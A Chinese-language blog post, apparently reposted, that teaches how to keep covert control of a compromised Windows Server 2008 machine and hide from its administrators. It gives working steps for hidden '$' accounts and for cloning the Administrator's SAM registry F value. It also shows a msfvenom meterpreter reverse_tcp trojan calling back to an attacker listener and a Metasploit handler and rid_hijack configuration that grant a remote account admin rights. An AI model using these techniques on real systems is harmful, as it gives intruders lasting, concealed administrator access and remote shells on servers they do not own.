本文主要記錄了當我們拿下一臺服務器后要進行權限維持,如何能夠隱藏我們所創建的賬號不備管理員所知曉,達到長期控制目的,其中有不正確的地方歡迎大佬評論指正,
文章目錄
- 前言
- 以windows2008為例:
- 一、賬號克隆
- 1、賬號創建
- 2、賬號禁用
- 3、打開注冊表
- 4、進行賬號克隆
- 5、通過新用戶登錄
- 二、RID劫持
- 1.通過MSF生成payload回傳會話
- 2、通過會話創建賬號
- 3、使用rid_hijack進行RID劫持
前言
當我們拿下一臺服務器后,直接創建新用戶不做任何改變的話,很容易被管理員所察覺,
以windows2008為例:
1、創建隱藏賬戶
net user ph$ 123@com /add
2、直接使用命令無法查看到新建用戶
net user
3、但是我們在用戶和組管理中可以看到該用戶情況,但是這并不是主要的,如果我們通過該用戶進行登錄該計算機,計算機會在C:\Users下創建一個以該用戶名所創建的檔案夾,這個太容易導致管理員發現有新建未知用戶了/font>
4、下面的兩種方法可以很好的避免在Users檔案夾下創建新的目錄情況
一、賬號克隆
本方法適用于在本地進行操作
1、賬號創建
net user ph1$ 123.com /add
2、賬號禁用
為了有更好的演示效果,我將上面所創建的ph1$賬戶進行禁用
開始 – 管理工具 – 計算機管理 – 用戶與組 – 用戶
3、打開注冊表
win + r鍵 – 輸入:regedit
找到如下路徑,打開第二個SAM檔案時,我們一般沒有權限,所以選中該檔案然后右鍵,選中權限,打開后將administrator權限賦值為:完全控制,結束后點擊確定,這個時候再在該頁面頂部選擇查看 – 重繪 ,這個時候設定才會生效,
HKEY_LOCAL_MACHINE /SAM /SAM /Domains /Users /name
4、進行賬號克隆
通過步驟3中我們所進入的檔案夾下面,找到你要克隆的賬號,這里我們需要克隆Administrator賬號,就選擇該賬號的檔案夾并打開記住其型別值,我的這里是:1f4,然后根據型別值在Users檔案夾下面找到對應型別值的目錄
打開上訴找到的目錄并打開里面名稱為F的檔案,復制里面的內容
根據上述的方法,找到我們想要替換的用戶,將我們復制的內容替換其F值里面的內容,我這里則是要替換ph1$賬戶的F值內容
5、通過新用戶登錄
上述步驟完成之后,我們使用ph1$這個新用戶登錄,查看服務器的變化
通過上述我們可以知道,該賬號的權限為Administrator權限,同時打開用戶管理時顯示為禁用狀態,在User下面不會創建新的以用戶名為名字的目錄,這樣可以起一個很好的掩飾作用,
二、RID劫持
賬號克隆雖然可以對我們所創建的用戶進行一定的隱藏,但是它任然需要登錄到本地才可以,這個在實戰程序中有很大的局限性,所以我們可以通過RID劫持的方法來創建新的用戶,讓我們可以遠程創建用戶,同時能夠起到隱藏作用
1.通過MSF生成payload回傳會話
這里為了方便演示我直接在本地生成然后上傳,在實戰程序中建議使用冰蝎,能夠很方便的給我們回傳msf會話
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.24 lport=12348 -f exe > s4.exe
payload生成好后,上傳到服務器,然后打開msf,進行監聽會話
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.111.22
set lport 12348
run
在win2008服務器上運行生成的木馬檔案,msf可以接識訓傳的會話就可以進行下一步操作了
2、通過會話創建賬號
在msf的會話視窗,輸入shell,就可以使用DOS命令來創建賬號了,具體步驟如下:
1、shell
2、net user qq3$ 123.com /add
用戶創建成功之后回傳,將當前session放在后臺運行,即輸入:background,并記住當前sesson編號為1,也可以通過輸入sessions命令來查看session編號
3、使用rid_hijack進行RID劫持
通過下述步驟配置相應的引數:
1、search rid_h
2、use 0 //即使用:post/windows/manage/rid_hijack
3、options //查看要填寫的內容
4、set GETSySTEM true
5、set GUEST_ACCOUNT false
6、set PASSWORD 123.com
7、set SESSION 1
8、set USERNAME qq3$
9、run
運行之后回傳如下表示劫持成功
為了進一步測驗效果我們先選擇遠程連接該服務器,應該再劫持前就嘗試遠程連接一下的,一般我們是沒有權限去連接的,由于我往了所以這一步我就省略了,這里直接來查看劫持之后的遠程連接效果:
成功連接同時權限也是administrator權限,同時在Users檔案夾下面沒有創建新的用戶目錄,在本地登錄與在遠程登錄效果相同,這里我就不截圖進行證明了,各位有興趣的小伙伴可以自己去嘗試
同時該方法我認為不僅可以進行權限維持,當我們在滲透測驗程序中,我們拿到高權限用戶但是沒有密碼,應該也可以通過這種方法克隆一個相同權限的用戶,然后也就可以進行遠程登錄,幫助我們進一步測驗,這個我暫時沒有實測過,有興趣的小伙伴可以進行相關實驗,
針對RID劫持這里有一篇文章將的還不錯:
RID劫持細講
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/398605.html
標籤:其他